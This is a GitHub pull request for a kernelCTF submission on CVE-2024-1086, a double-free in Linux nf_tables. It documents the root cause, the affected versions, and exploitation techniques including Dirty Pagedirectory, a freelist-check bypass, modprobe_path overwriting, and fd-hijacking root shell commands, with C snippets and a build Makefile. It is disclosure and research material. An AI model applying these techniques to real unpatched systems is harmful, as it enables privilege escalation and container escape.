kernelCTF: added CVE-2024-1086 lts mitigation #96

Merged
merged 39 commits into from
Sep 12, 2024
Changes from 23 commits
6bbf4c3
kernelCTF: added CVE-2024-1086 lts mitigation
Notselwyn Apr 3, 2024
4679759
fix: musl-tools added
Notselwyn Apr 4, 2024
2247e38
fix: trying apt update to fix include issue?
Notselwyn Apr 4, 2024
abf94e0
fix: tred fixing includes replacing musl-gcc with gcc. stability conc…
Notselwyn Apr 4, 2024
6bd783b
fix: reversed previous commit. invalid AVX512 instructions
Notselwyn Apr 4, 2024
f8dc724
fix: tried including -mno-avx512f
Notselwyn Apr 4, 2024
3a2e162
fix: tried replacing musl-gcc with gcc
Notselwyn Apr 4, 2024
ace0b44
fix: reverse previous -mno-avx512f commit (it does not fix static gli…
Notselwyn Apr 4, 2024
c4f8d3c
fix: attempted fix by inversing include dirs, and added debug statements
Notselwyn Apr 7, 2024
d2b943d
fix: added debug statements
Notselwyn Apr 7, 2024
7ed3c6e
fix: added more debuig
Notselwyn Apr 7, 2024
6001429
fix: added header files
Notselwyn Apr 7, 2024
6a47e54
fix: added UAPI header files for lts
Notselwyn Apr 7, 2024
9d205d3
fix: removed debug statements
Notselwyn Apr 7, 2024
65aaf65
CVE-2024-1086: added more info to exploit (still incomplete)
Notselwyn Apr 22, 2024
a4da963
fix: completed exploit.md
Notselwyn May 15, 2024
e9bf593
docs: added abbreviations for diagram
Notselwyn Jul 24, 2024
af171cb
docs: added references in code snippet
Notselwyn Jul 24, 2024
b16d13d
docs: explained ip struct values in detail
Notselwyn Jul 24, 2024
f9231eb
docs: included link to blogpost
Notselwyn Jul 24, 2024
7c81a0c
docs: fixed PUD pagetable layer nr
Notselwyn Jul 25, 2024
3a7fdcd
docs: improved documentation for dirty pagetable technique
Notselwyn Jul 25, 2024
e79a21a
docs: changed paths to external repo to relative path in repo
Notselwyn Jul 29, 2024
5b669bd
Update novel-techniques.md
Notselwyn Sep 10, 2024
cfc6857
test: kernelctf gcc static compile
Notselwyn Sep 11, 2024
8052699
Merge branch 'master' of https://github.com/Notselwyn/security-research
Notselwyn Sep 11, 2024
fa84cc2
test: added libmnl-dev dependency for header
Notselwyn Sep 11, 2024
7d25ba8
fix: added libnftnl headers to dependencies
Notselwyn Sep 11, 2024
c947564
test: switched to using apt installed headers
Notselwyn Sep 11, 2024
af609ba
fix: include header path
Notselwyn Sep 11, 2024
13106b9
fix: changed include path order
Notselwyn Sep 11, 2024
c430f4a
fix: include with incorrect header paths
Notselwyn Sep 11, 2024
0a7cabc
fix: linux header include path
Notselwyn Sep 11, 2024
04004a6
chore: got rid of header bomb lol
Notselwyn Sep 11, 2024
9babeec
fix: asm headers
Notselwyn Sep 11, 2024
b58725c
fix: asm-generic headers (please let this be the last)
Notselwyn Sep 11, 2024
4ce9f15
fix: asm headers
Notselwyn Sep 11, 2024
78128d5
fix: got rid of header nuke
Notselwyn Sep 11, 2024
3d18475
chore: got rid of header nuke for real this time
Notselwyn Sep 11, 2024
721 changes: 721 additions & 0 deletions pocs/linux/kernelctf/CVE-2024-1086_lts_mitigation/docs/exploit.md

Large diffs are not rendered by default.

@@ -0,0 +1,205 @@
# novel-techniques

TODO: increase description granularity for techniques proven to be novel.


I see there is still a TODO here, do you want to make any changes before we merge this?

Contributor Author


Thanks for picking it up. If you believe the explanations are detailed enough, I'm fine with the way it currently is :-)

Collaborator


Could you please still look into if you can exclude the header files?

There are several other nftables submissions in the repo and in the PRs. Is there anything different in your submission which does not make this possible?


## Bypassing KernelCTF mitigation instance corruption checks for skb's

One of the mitigations in the KernelCTF Mitigation instance is checking the freelist next pointer when allocating an object through a freelist pointer.

In the exploit, the following happens when doing the double-free:
1. alloc skb1
2. free skb1 (set new freelist pointer)
3. modify skb->len (overlapping with freelist next pointer)
4. free skb1 (set new freelist pointer)

This means that in step 3 the freelist next pointer gets corrupted (`CONFIG_SLAB_FREELIST_HARDENED` is left out of consideration here for demonstration purposes). When background applications on the system try to transmit packets, they will inevitably try to allocate the skb object with the corrupted freelist next pointer, causing a system crash.

To bypass this, we leverage the fact that these corruption checks only happen on allocation, not on free. We can therefore mask the corrupted object by spraying "healthy" objects which get allocated instead. The sequence then looks like this:

1. alloc N skb objects
2. alloc skb1
3. free skb1 (set new freelist pointer)
4. modify skb->len (overlapping with freelist next pointer)
5. free N skb objects
6. free skb1 (set new freelist pointer)

Whilst this is probably not the vulnerability which freelist next pointer corruption detection is intended to mitigate, it would definitely mitigate exploitation of this specific scenario.

The fix for this technique would be checking the freelist next pointer of the previous object in the freelist when freeing an object.
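
The masking effect can be illustrated with a userland toy model. This is only a sketch under simplifying assumptions: a single LIFO freelist, a next pointer stored in the first word of each object, and a sanity check performed only on allocation. All names (`toy_cache`, `toy_alloc`, `toy_free`, `toy_double_free_survives`) are hypothetical and do not correspond to kernel symbols.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

#define TOY_POOL_SIZE 16

/* Hypothetical toy object: the first word doubles as the freelist next pointer. */
struct toy_obj {
    struct toy_obj *next;
};

struct toy_cache {
    struct toy_obj pool[TOY_POOL_SIZE];
    struct toy_obj *freelist; /* LIFO list of freed objects */
    size_t fresh;             /* pool slots handed out so far */
};

/* A next pointer is "sane" if it is NULL or points into the pool. */
static bool toy_next_is_sane(const struct toy_cache *c, const struct toy_obj *p)
{
    uintptr_t lo = (uintptr_t)&c->pool[0];
    uintptr_t hi = (uintptr_t)&c->pool[TOY_POOL_SIZE];
    uintptr_t v = (uintptr_t)p;

    return p == NULL || (v >= lo && v < hi);
}

/* Allocation validates the next pointer of the object being handed out. */
static struct toy_obj *toy_alloc(struct toy_cache *c, bool *crashed)
{
    struct toy_obj *obj = c->freelist;

    if (obj == NULL)
        return c->fresh < TOY_POOL_SIZE ? &c->pool[c->fresh++] : NULL;
    if (!toy_next_is_sane(c, obj->next)) {
        *crashed = true; /* stands in for the system crash */
        return NULL;
    }
    c->freelist = obj->next;
    return obj;
}

/* Free performs no validation at all, which is what the bypass relies on. */
static void toy_free(struct toy_cache *c, struct toy_obj *obj)
{
    obj->next = c->freelist;
    c->freelist = obj;
}

/* Returns true if n_background allocations between the two frees survive. */
static bool toy_double_free_survives(size_t n_spray, size_t n_background)
{
    struct toy_cache c = {0};
    struct toy_obj *spray[TOY_POOL_SIZE];
    struct toy_obj *skb1;
    bool crashed = false;
    size_t i;

    if (n_spray >= TOY_POOL_SIZE)
        return false;

    for (i = 0; i < n_spray; i++)
        spray[i] = toy_alloc(&c, &crashed);                /* 1. alloc N objects */
    skb1 = toy_alloc(&c, &crashed);                        /* 2. alloc skb1 */
    toy_free(&c, skb1);                                    /* 3. free skb1 */
    skb1->next = (struct toy_obj *)(uintptr_t)0x41414141;  /* 4. corrupt next */
    for (i = 0; i < n_spray; i++)
        toy_free(&c, spray[i]);                            /* 5. free N objects */
    for (i = 0; i < n_background && !crashed; i++)
        (void)toy_alloc(&c, &crashed);                     /* background traffic */
    toy_free(&c, skb1);                                    /* 6. second free rewrites next */

    return !crashed;
}
```

In this model, `toy_double_free_survives(4, 4)` holds because the four background allocations are served from the sprayed objects, whereas `toy_double_free_survives(0, 1)` fails because the very first background allocation hits the corrupted object.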


## Dirty Pagedirectory (pagetable confusion)

Perhaps the most interesting technique in this exploit is Dirty Pagedirectory: plainly put, pagetable confusion between pagetables like PUD+PMD and PMD+PTE.

By overlapping a PUD page and a PMD page (PUD+PMD), or a PMD page and a PTE page (PMD+PTE), we can set pagetable entries from userland pages. This gives the exploit a *very* powerful primitive: rapid memory reads/writes across all physical memory of the system.

> Note: it does **not** make use of recursion, as (in case of PUD+PMD) the PMD is not the child of the overlapped PUD, but is the child of a normal, arbitrary PUD.

Note that PT entries include not only the physical address (PFN), but also the page flags. Hence, we can write to read-only pages like the one containing `modprobe_path`. As if that isn't enough, the target area can span 1GiB (PMD+PTE) and/or 512GiB (PUD+PMD) of addresses at the same time. Of course, this can be limited to save memory usage and overhead.

In the blogpost, this diagram tries to describe it:

![Dirty Pagedirectory diagram showing the relations between different pagetable layers in an exploit](https://pwning.tech/content/images/2024/03/dirtypagedirectory.svg)
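
To make the "PFN plus flags" point and the 1GiB/512GiB figures concrete, here is a small sketch assuming the x86-64 4-level layout with 4KiB pages and 512 entries per table page. The helper names (`make_pte`, `table_span`) and macro names are hypothetical and are not taken from the exploit; only the bit positions follow the x86-64 pagetable entry format.

```c
#include <stdint.h>

/* x86-64 pagetable entry bits (4KiB pages) */
#define X86_PTE_PRESENT  (1ULL << 0)
#define X86_PTE_RW       (1ULL << 1)
#define X86_PTE_USER     (1ULL << 2)
#define X86_PTE_NX       (1ULL << 63)
#define X86_PTE_PFN_MASK 0x000ffffffffff000ULL /* physical address, bits 12..51 */

#define TOY_ENTRIES_PER_TABLE 512ULL
#define TOY_PAGE_SIZE         4096ULL

/* Combine a page-aligned physical address with the desired page flags. */
static uint64_t make_pte(uint64_t phys_addr, uint64_t flags)
{
    return (phys_addr & X86_PTE_PFN_MASK) | flags;
}

/* Bytes of address space covered by one table page at the given level
 * (1 = PTE page, 2 = PMD page, 3 = PUD page). */
static uint64_t table_span(unsigned int level)
{
    uint64_t span = TOY_PAGE_SIZE;

    while (level-- > 0)
        span *= TOY_ENTRIES_PER_TABLE;
    return span;
}
```

Under these assumptions, `table_span(2)` is 1GiB and `table_span(3)` is 512GiB, and an entry such as `make_pte(phys, X86_PTE_PRESENT | X86_PTE_RW | X86_PTE_USER)` maps the physical page as writable from userland regardless of how the kernel itself maps it.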


## Freeing skb's instantly on arbitrary CPUs without UDP/TCP stacks

In order to bypass certain double-free detections, we need to free skb's at specific times on specific CPUs. Additionally, we cannot make use of the UDP and TCP stacks in the kernel, since they access fields in the skb which are corrupted by the double-free.

Fortunately, we can do this with the IPv4 fragment queues (IFQs). By sending an IPv4 fragment to localhost, we make it wait in an IFQ for `ipfrag_time` seconds, after which all fragments in the queue are freed. Alternatively, the fragments get freed when the IFQ is completed (i.e. the target length is reached with the fragments in the IFQ).

If needed, we can prolong the lifetime of the IFQ by writing to `/proc/sys/net/ipv4/ipfrag_time`.

Unfortunately, the target length of the IFQ depends on skb->len, which is corrupted by the double-free. Hence, we need to free the skb's by triggering an error in the IFQ code, causing it to free all fragments in the queue on the CPU handling the triggering skb.

It looks like this in action with the double-free:
1. alloc skb1 (double-freed IPv4 fragment) @ CPU `X`
2. free skb1 (1) @ CPU `X`
3. make skb1 go into IFQ (utilizing its content)
4. do stuff here, like spraying skb's, spraying PTEs, etc
5. alloc skb2 (erroneous IPv4 fragment) @ CPU `Y`
6. free skb2 @ CPU `Y`
7. free skb1 @ CPU `Y`
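
As an illustration of what "sending an IPv4 fragment" involves, the sketch below fills in an IPv4 header whose "more fragments" flag is set, so that the receiving stack parks the packet in a fragment queue instead of delivering it. The struct and function names (`toy_ipv4_hdr`, `toy_build_fragment`) are hypothetical, the field values are assumptions rather than the values used by the exploit, and how the erroneous fragment from step 5 is crafted is not covered here.

```c
#include <arpa/inet.h>
#include <netinet/in.h>
#include <stdint.h>
#include <string.h>

#define TOY_IP_MF 0x2000 /* "more fragments" flag in the frag_off field */

/* Hypothetical stand-in for the 20-byte IPv4 header without options. */
struct toy_ipv4_hdr {
    uint8_t  ver_ihl;   /* version (4 bits) + header length in 32-bit words */
    uint8_t  tos;
    uint16_t tot_len;   /* header + payload, network byte order */
    uint16_t id;        /* fragments with the same id share one queue */
    uint16_t frag_off;  /* flags (3 bits) + offset in 8-byte units */
    uint8_t  ttl;
    uint8_t  protocol;
    uint16_t check;     /* left at 0 in this sketch */
    uint32_t saddr;
    uint32_t daddr;
};

static void toy_build_fragment(struct toy_ipv4_hdr *h, uint16_t id,
                               uint16_t payload_len, uint16_t offset_bytes,
                               int more_fragments, uint8_t protocol)
{
    uint16_t flags = more_fragments ? TOY_IP_MF : 0;

    memset(h, 0, sizeof(*h));
    h->ver_ihl = (4 << 4) | 5;
    h->tot_len = htons((uint16_t)(sizeof(*h) + payload_len));
    h->id = htons(id);
    h->frag_off = htons((uint16_t)(flags | (offset_bytes >> 3)));
    h->ttl = 64;
    h->protocol = protocol;
    h->saddr = htonl(INADDR_LOOPBACK); /* localhost -> localhost */
    h->daddr = htonl(INADDR_LOOPBACK);
}
```

A header built with `more_fragments` set and `offset_bytes == 0` describes the first fragment of a datagram; as long as no fragment completes the datagram, the queue lives until `ipfrag_time` expires or an error tears it down.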

## Fileless privesc using fd hijacking

We can escape the namespace by doing file descriptor hijacking: hooking up the file descriptors of another process (or `/dev/console`) to the `/bin/sh` instance as root triggered by the `modprobe_path` technique.

For example:
- hijack `/dev/console` (works only on local TTYs): `/bin/sh 0</dev/console 1>/dev/console 2>&1`
- hijack exploit fd's (works on reverse shells as well): `/bin/sh 0</proc/<exploit_pid>/fd/0 1>/proc/<exploit_pid>/fd/1 2>&1`

This way we can do fileless privesc and escape the namespace without even writing a single file, allowing for privesc on read-only systems.
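
A minimal sketch of building the second command line for a given exploit PID follows. The helper name `build_hijack_cmd` is hypothetical; only the command format is taken from the example above.

```c
#include <stdio.h>
#include <sys/types.h>

/* Writes the fd-hijacking shell command for exploit_pid into buf.
 * Returns the command length, or -1 if buf is too small. */
static int build_hijack_cmd(char *buf, size_t len, pid_t exploit_pid)
{
    int n = snprintf(buf, len,
                     "/bin/sh 0</proc/%d/fd/0 1>/proc/%d/fd/1 2>&1",
                     (int)exploit_pid, (int)exploit_pid);

    return (n < 0 || (size_t)n >= len) ? -1 : n;
}
```

The PID has to be the one visible from the root namespace, since that is where the root shell resolves `/proc`.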

## Fileless privesc using modprobe_path + procfs

We can combine overwriting `modprobe_path` with procfs to allow for fileless privesc script execution as root from the root namespace. With this primitive, we can utilize fd hijacking to perform fileless namespace escapes.

We can overwrite `modprobe_path` to `/proc/<exploit_pid>/fd/<privesc_script_fd>` and it will execute the privesc script completely from memory, allowing privesc on read-only systems.
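
The new `modprobe_path` value can be composed as sketched below. The helper name `build_modprobe_target` is hypothetical, and the sketch assumes the privesc script already lives behind an open file descriptor of the exploit process (for instance an in-memory file, which is an assumption and not something stated above).

```c
#include <stdio.h>
#include <sys/types.h>

/* Writes "/proc/<exploit_pid>/fd/<script_fd>" into buf.
 * Returns the path length, or -1 if buf is too small. */
static int build_modprobe_target(char *buf, size_t len, pid_t exploit_pid,
                                 int script_fd)
{
    int n = snprintf(buf, len, "/proc/%d/fd/%d", (int)exploit_pid, script_fd);

    return (n < 0 || (size_t)n >= len) ? -1 : n;
}
```

The resulting string, including its terminating NUL byte, has to fit in the kernel's `modprobe_path` buffer, so the return value is worth checking before writing it.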

## TLB flushing with PCID enabled

One of the things required for Dirty Pagedirectory is a working TLB flushing primitive. Assuming the target VMA is shared, we can fork() and munmap() that VMA in the child. This allows for 100% working TLB flushing regardless of PCID, without altering the original pagetables. I presume the CPU needs to be pinned, to avoid flushing an incorrect CPU core's TLB cache.

The code for this looks like:

```c
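#include <sys/mman.h>
#include <unistd.h>

// assumed values: the exploit defines these constants elsewhere
#define FLUSH_STAT_INPROGRESS 0
#define FLUSH_STAT_DONE 1

#define SPINLOCK(cmp) while (cmp) { usleep(10 * 1000); }

// presumably needs to be CPU pinned
static void flush_tlb(void *addr, size_t len)
{
    short *status;

    // shared anonymous page, so the child can signal completion to the parent
    status = mmap(NULL, sizeof(short), PROT_READ | PROT_WRITE, MAP_SHARED | MAP_ANONYMOUS, -1, 0);

    *status = FLUSH_STAT_INPROGRESS;
    if (fork() == 0)
    {
        // unmapping the shared VMA in the child causes the TLB flush
        munmap(addr, len);
        *status = FLUSH_STAT_DONE;
        sleep(9999);
    }

    // wait until the child has finished unmapping
    SPINLOCK(*status == FLUSH_STAT_INPROGRESS);

    munmap(status, sizeof(short));
}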
```

Note that the child sleeps instead of exits, to avoid certain kernel bugs when doing dirty pagedirectory.

## Easing physical KASLR bruteforce

It is possible to ease physical KASLR bruteforcing. The Linux kernel base is aligned to `CONFIG_PHYSICAL_START` (and/or `CONFIG_PHYSICAL_ALIGN`) bytes. This essentially means the Linux kernel base must be aligned to 16MiB or 2MiB. With 16MiB alignment, this reduces the number of possible base addresses from e.g. every byte address in 8GiB (assuming 8GiB physical memory) to 8GiB / 16MiB = 512 addresses (a bruteforceable amount).
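
The arithmetic can be written down as a short sketch. The helper names (`kaslr_candidate_count`, `kaslr_candidate_addr`) are hypothetical, and the sketch assumes the kernel base can sit at any aligned address inside physical memory.

```c
#include <stdint.h>

/* Number of aligned physical addresses at which the kernel base could sit. */
static uint64_t kaslr_candidate_count(uint64_t phys_mem_bytes, uint64_t align_bytes)
{
    return align_bytes ? phys_mem_bytes / align_bytes : 0;
}

/* The index-th candidate base address for the given alignment. */
static uint64_t kaslr_candidate_addr(uint64_t index, uint64_t align_bytes)
{
    return index * align_bytes;
}
```

For 8GiB of memory this gives 512 candidates at 16MiB alignment and 4096 candidates at 2MiB alignment, both small enough to walk in a loop.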

## Validating the correct modprobe_path

We can validate if we found the correct `modprobe_path` object in physical memory (when using Dirty Pagedirectory), by checking if the output of `/proc/sys/kernel/modprobe` has changed to the new value, since it is a "real-time" reference to the `modprobe_path` object used in the kernel.

For example, this can be done with:

```c
#define _GNU_SOURCE // for memmem()
#include <stdio.h>
#include <string.h>

// read_file() and KMOD_PATH_LEN are defined elsewhere in the exploit source
static int get_modprobe_path(char *buf, size_t buflen)
{
    int size;

    size = read_file("/proc/sys/kernel/modprobe", buf, buflen);

    // guard against empty or failed reads before indexing buf[size-1]
    if (size <= 0)
    {
        buf[0] = '\x00';
        return size;
    }

    if ((size_t)size == buflen)
        printf("[*] ==== read max amount of modprobe_path bytes, perhaps increment KMOD_PATH_LEN? ====\n");

    // remove \x0a
    buf[size-1] = '\x00';

    return size;
}

static int strcmp_modprobe_path(char *new_str)
{
    char buf[KMOD_PATH_LEN] = { '\x00' };

    get_modprobe_path(buf, KMOD_PATH_LEN);

    return strncmp(new_str, buf, KMOD_PATH_LEN);
}

void *memmem_modprobe_path(void *haystack_virt, size_t haystack_len, char *modprobe_path_str, size_t modprobe_path_len)
{
    void *pmd_modprobe_addr;

    // search 0x200000 bytes (the area covered by a full PTE page) at a time for the modprobe_path signature
    pmd_modprobe_addr = memmem(haystack_virt, haystack_len, modprobe_path_str, modprobe_path_len);
    if (pmd_modprobe_addr == NULL)
        return NULL;

    // check if this is the actual modprobe_path by overwriting it, and checking /proc/sys/kernel/modprobe
    strcpy(pmd_modprobe_addr, "/sanitycheck");
    if (strcmp_modprobe_path("/sanitycheck") != 0)
    {
        printf("[-] ^false positive. skipping to next one\n");
        return NULL;
    }

    return pmd_modprobe_addr;
}
```

## Page refcount juggling

When freeing a page, the Linux kernel decrements the page's refcount and checks if it has reached 0. If it has not, the kernel will refuse to free the page. To bypass this behaviour we simply juggle the refcounts, by utilizing the following order of operations for the double-free:

1. alloc obj1 | refcount 0 -> 1
2. free obj1 | refcount 1 -> 0
3. alloc obj2 | refcount 0 -> 1
4. free obj1 | refcount 1 -> 0
5. alloc obj3 | refcount 0 -> 1

obj2 and obj3 will now be overlapping (having the same page), because the refcounts were always 0 when freeing.

```c
void __free_pages(struct page *page, unsigned int order)
{
	/* get PageHead before we drop reference */
	int head = PageHead(page);

	if (put_page_testzero(page))
		free_the_page(page, order);
	else if (!head)
		while (order-- > 0)
			free_the_page(page + (1 << order), order);
}
```
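
The difference between a naive double-free and the juggled order can be seen in a userland toy model. This is a sketch with hypothetical names (`toy_page`, `toy_allocator`, and so on); it models only the rule that a page is returned to the allocator when its refcount drops from 1 to 0, and nothing else about the real page allocator.

```c
#include <stdbool.h>
#include <stddef.h>

#define TOY_MAX_FREE 4

struct toy_page {
    int refcount;
};

struct toy_allocator {
    struct toy_page *free_stack[TOY_MAX_FREE];
    size_t n_free;
};

/* Pop a page from the freelist and take the initial reference. */
static struct toy_page *toy_page_alloc(struct toy_allocator *a)
{
    struct toy_page *p;

    if (a->n_free == 0)
        return NULL;
    p = a->free_stack[--a->n_free];
    p->refcount = 1;
    return p;
}

/* Drop a reference; the page is only freed when the count reaches 0. */
static bool toy_page_free(struct toy_allocator *a, struct toy_page *p)
{
    if (p->refcount <= 0 || a->n_free == TOY_MAX_FREE)
        return false; /* refused: nothing left to drop */
    if (--p->refcount != 0)
        return false; /* still referenced */
    a->free_stack[a->n_free++] = p;
    return true;
}

/* Juggled order: returns true if obj2 and obj3 end up on the same page. */
static bool toy_juggled_double_free(void)
{
    struct toy_page page = { .refcount = 0 };
    struct toy_allocator a = { .free_stack = { &page }, .n_free = 1 };
    struct toy_page *obj1, *obj2, *obj3;

    obj1 = toy_page_alloc(&a);   /* 1. refcount 0 -> 1 */
    toy_page_free(&a, obj1);     /* 2. refcount 1 -> 0 */
    obj2 = toy_page_alloc(&a);   /* 3. refcount 0 -> 1 */
    toy_page_free(&a, obj1);     /* 4. refcount 1 -> 0 (second free of obj1) */
    obj3 = toy_page_alloc(&a);   /* 5. refcount 0 -> 1 */

    return obj2 != NULL && obj2 == obj3;
}

/* Naive order: returns whether the second, back-to-back free is accepted. */
static bool toy_naive_double_free(void)
{
    struct toy_page page = { .refcount = 0 };
    struct toy_allocator a = { .free_stack = { &page }, .n_free = 1 };
    struct toy_page *obj1 = toy_page_alloc(&a);

    toy_page_free(&a, obj1);
    return toy_page_free(&a, obj1);
}
```

In this model `toy_juggled_double_free()` reports overlapping objects, while `toy_naive_double_free()` reports that the second free was refused.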

## Double-free order 4 to order 0 (old: race condition)

When double-freeing pages, we can convert the page order to 0 utilizing a race condition with a `WARN()` message on really slow systems (like QEMU VMs with synchronous terminals). In the new exploit, this has been replaced with PCP draining as this works on all systems.

This allows us to double-allocate `order==0` pages whilst having a double-free primitive on `order==4` pages.

## Double-free order X to order Y (new: PCP refill)

When double-freeing pages, we can convert the page order to an arbitrary order by double-freeing pages with `order>=4` such that it will end up in the buddy allocator freelist. Then, we can allocate it to the PCP list of an arbitrary `order<=3` page freelist, by draining said PCP-freelist and refilling it with the pages from the buddy-freelist.

This is the new variant of the race condition-based method.
@@ -0,0 +1,47 @@
# vulnerability

Document containing information about the vulnerability, the requirements, and the affected Linux kernel versions.

## technical details

### outlines

The root cause is an input sanitization bug in `nft_verdict_init()` (`net/netfilter/nf_tables_api.c:9814`), which allowed rule verdicts to return positive drop errors. This is classified as CVE-2024-1086.

The impact of this is a stable double-free primitive on both `struct sk_buff` objects, as well as `sk_buff->head` objects (kmalloc objects, ranging from size 256 to 65536 (assuming ipv4) a.k.a. order 4 buddy pages).

The fix for the vulnerability was simply disallowing all drop errors in `nft_verdict_init()`, so that userland applications can no longer provide any drop errors. It did not make sense to the kernel developers that userland applications could do this in the first place, so they disabled it completely.

### triggering the bug

An exploit can create a rule containing an expression which sets the verdict to `0xFFFF0000`.

When this rule gets evaluated for an skb passing the nf_tables firewall, `nf_hook_slow()` attempts to free an skb object because `NF_DROP` is returned from the verdict mask of the rule verdict (`0xFFFF0000 (verdict) & 0x000000ff (NF_VERDICT_MASK) == 0 (NF_DROP)`). Then, `nf_hook_slow()` returns `NF_ACCEPT` (`NF_DROP_GETERR(0xFFFF0000) == NF_ACCEPT`) as if every hook/rule in the chain returned `NF_ACCEPT`.

This causes the caller of `nf_hook_slow()` to misinterpret the situation: it believes the packet has not been freed and should still be handled. It therefore continues parsing the packet and eventually double-frees both the skb object and its skb->head object.

## requirements

Capabilities:
- `CAP_NET_ADMIN`

Kernel configuration:
- `CONFIG_NF_TABLES=y`
- `CONFIG_NETFILTER=y`

User namespaces needed:
- Yes, in order to set up rules for nf_tables to trigger the bug (`CAP_NET_ADMIN` in the current namespace should also be enough)

## version info

Commit which introduced the vuln:
- https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=e0abdadcc6e113ed2e22c85b35007

Commit which fixed the vuln (revert of previous commit):
- https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=f342de4e2f33e0e39165d8639387aa6c19dff660

Affected kernel versions:
- everything between `v3.5` and `v6.8-rc1`
- excluding `v6.1.76` and higher on `v6.1.x`
- excluding `v6.6.15` and higher on `v6.6.x`
- excluding `v6.7.3` and higher on `v6.7.x`
@@ -0,0 +1,34 @@
SRC_FILES := src/exploit.c src/env.c src/net.c src/nftnl.c src/file.c
OUT_NAME = ./exploit

# use musl-gcc since statically linking glibc with gcc generated invalid opcodes for qemu
# and dynamically linking raised glibc ABI versioning errors
CC = musl-gcc

# use custom headers with fixed versions in a musl-gcc compatible manner
# - ./include/libmnl: libmnl v1.0.5
# - ./include/libnftnl: libnftnl v1.2.6
# - ./include/linux-lts-6.1.72: linux v6.1.72
CFLAGS = -I./include -I./include/linux-lts-6.1.72 -Wall -Wno-deprecated-declarations

# use custom object archives compiled with musl-gcc for compatibility. normal ones
# are used with gcc and have _chk funcs which musl doesn't support
# the versions are the same as the headers above
LIBMNL_PATH = ./lib/libmnl.a
LIBNFTNL_PATH = ./lib/libnftnl.a

exploit: _compile_static _strip_bin
prerequisites: _install_musl
run: _run_outfile
clean: _clean_outfile

_install_musl:
	sudo apt-get install musl-tools
_compile_static:
	$(CC) $(CFLAGS) $(SRC_FILES) -o $(OUT_NAME) -static $(LIBNFTNL_PATH) $(LIBMNL_PATH)
_strip_bin:
	strip $(OUT_NAME)
_run_outfile:
	$(OUT_NAME)
_clean_outfile:
	rm $(OUT_NAME)
Binary file not shown.